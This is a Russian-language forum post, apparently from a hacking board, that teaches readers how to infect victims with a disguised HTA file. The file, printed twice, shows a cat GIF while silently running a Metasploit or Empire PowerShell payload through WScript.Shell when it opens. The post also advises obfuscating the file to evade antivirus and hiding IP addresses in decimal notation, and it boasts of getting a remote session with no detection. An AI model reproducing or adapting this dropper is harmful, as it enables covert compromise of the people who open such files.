Всем привет, решил описать как мне кажется веселый метод заражения. Все будет как мы любим, весело, легко и без палевно. Поехали! Идем искать картинку (живую) то есть gif-ку... Была выбрана эта https://coub.com/view/kwse4 Далее нам по требуется код: Генерируем powershell в Empire или Metasploit я выбрал... КОД СКРИПТА: [/B] [LIST=1] [*][B]<html>[/B] [*][B]<head>[/B] [*][B] <title>NazvanieGif</title>[/B] [*][B] <hta:application id="NazvanieGif"[/B] [*][B] border="thin"[/B] [*][B] borderstyle="complex"[/B] [*][B] maximizeButton="no"[/B] [*][B] minimizeButton="no"[/B] [*][B] />[/B] [*][B]</head>[/B] [*][B]<script type="text/javascript">[/B] [*][B]var index = -1;[/B] [*][B]var images = [[/B] [*][B] "data:image/gif;base64,"];[/B] [*][B]function initGallery(){[/B] [*][B] window.resizeTo(300,300);[/B] [*][B] htaPayload();[/B] [*][B] nextPicture();[/B] [*][B]}[/B] [*][B]function nextPicture(){[/B] [*][B] var img;[/B] [*][B] index = index + 1;[/B] [*][B] if (index > images.length -1 ){[/B] [*][B] index = 0;[/B] [*][B] }[/B] [*][B] img = document.getElementById("gallery");[/B] [*][B] img.src = images[index];[/B] [*][B]}[/B] [*][B]function htaPayload(){[/B] [*][B] var payload="";[/B] [*][B] try{[/B] [*][B] if (navigator.userAgent.indexOf("Windows") !== -1){[/B] [*][B] new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);[/B] [*][B] }[/B] [*][B] }[/B] [*][B] catch(e){[/B] [*][B] }[/B] [*][B]}[/B] [*][B]</script>[/B] [*][B]<style>[/B] [*][B]#gallery, div {[/B] [*][B] width: 100%;[/B] [*][B] height: 100%;[/B] [*][B]}[/B] [*][B]#outer {[/B] [*][B] text-align: center;[/B] [*][B]}[/B] [*][B]#inner{[/B] [*][B] display: inline-block;[/B] [*][B]}[/B] [*][B]body {[/B] [*][B] background-color: black;[/B] [*][B]}[/B] [*][B]</style>[/B] [*][B]<body onload="initGallery()">[/B] [*][B] <div id="outer">[/B] [*][B] <div id="inner">[/B] [*][B] <img id="gallery" onclick="nextPicture()">[/B] [*][B] </div>[/B] [*][B] </div>[/B] [*][B]</body>[/B] [*][B]</html>[/B] [/LIST] [B] Код [/B] [LIST=1] [*][B]<html>[/B] [*][B]<head>[/B] [*][B] <title>NazvanieGif</title>[/B] [*][B] <hta:application id="NazvanieGif"[/B] [*][B] border="thin"[/B] [*][B] borderstyle="complex"[/B] [*][B] maximizeButton="no"[/B] [*][B] minimizeButton="no"[/B] [*][B] />[/B] [*][B]</head>[/B] [*][B]<script type="text/javascript">[/B] [*][B]var index = -1;[/B] [*][B]var images = [[/B] [*][B] "data:image/gif;base64,"];[/B] [*][B]function initGallery(){[/B] [*][B] window.resizeTo(300,300);[/B] [*][B] htaPayload();[/B] [*][B] nextPicture();[/B] [*][B]}[/B] [*][B]function nextPicture(){[/B] [*][B] var img;[/B] [*][B] index = index + 1;[/B] [*][B] if (index > images.length -1 ){[/B] [*][B] index = 0;[/B] [*][B] }[/B] [*][B] img = document.getElementById("gallery");[/B] [*][B] img.src = images[index];[/B] [*][B]}[/B] [*][B]function htaPayload(){[/B] [*][B] var payload="";[/B] [*][B] try{[/B] [*][B] if (navigator.userAgent.indexOf("Windows") !== -1){[/B] [*][B] new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);[/B] [*][B] }[/B] [*][B] }[/B] [*][B] catch(e){[/B] [*][B] }[/B] [*][B]}[/B] [*][B]</script>[/B] [*][B]<style>[/B] [*][B]#gallery, div {[/B] [*][B] width: 100%;[/B] [*][B] height: 100%;[/B] [*][B]}[/B] [*][B]#outer {[/B] [*][B] text-align: center;[/B] [*][B]}[/B] [*][B]#inner{[/B] [*][B] display: inline-block;[/B] [*][B]}[/B] [*][B]body {[/B] [*][B] background-color: black;[/B] [*][B]}[/B] [*][B]</style>[/B] [*][B]<body onload="initGallery()">[/B] [*][B] <div id="outer">[/B] [*][B] <div id="inner">[/B] [*][B] <img id="gallery" onclick="nextPicture()">[/B] [*][B] </div>[/B] [*][B] </div>[/B] [*][B]</body>[/B] [*][B]</html>[/B] [/LIST] [B] И вставляем в 37 строчку, между: далее переходим на очень полезный онлайн ресурс → https://www.browserling.com/tools/image-to-base64 Иногда кстати выручает для различного рода задач, например кодировке IP адреса в бинарник для последующего его скрытия, не множечко отступлю от темы покажу: например скрываем 127.0.0.1 127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433 Так вот переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в Как видите в 17 строку) Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе http://www.newfreeware.com/webmaster/526/ Сохраняем полученный код в блокноте, под любым именем но в формате .hta < - Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котикам или c ..уем), а к Вам прилетит заветная сессия) при желании можно иконку навесить (не знаю как, если кто знает, подскажите) и ДЕТЕКТА НЕТ!! Просьба, не тестить!!!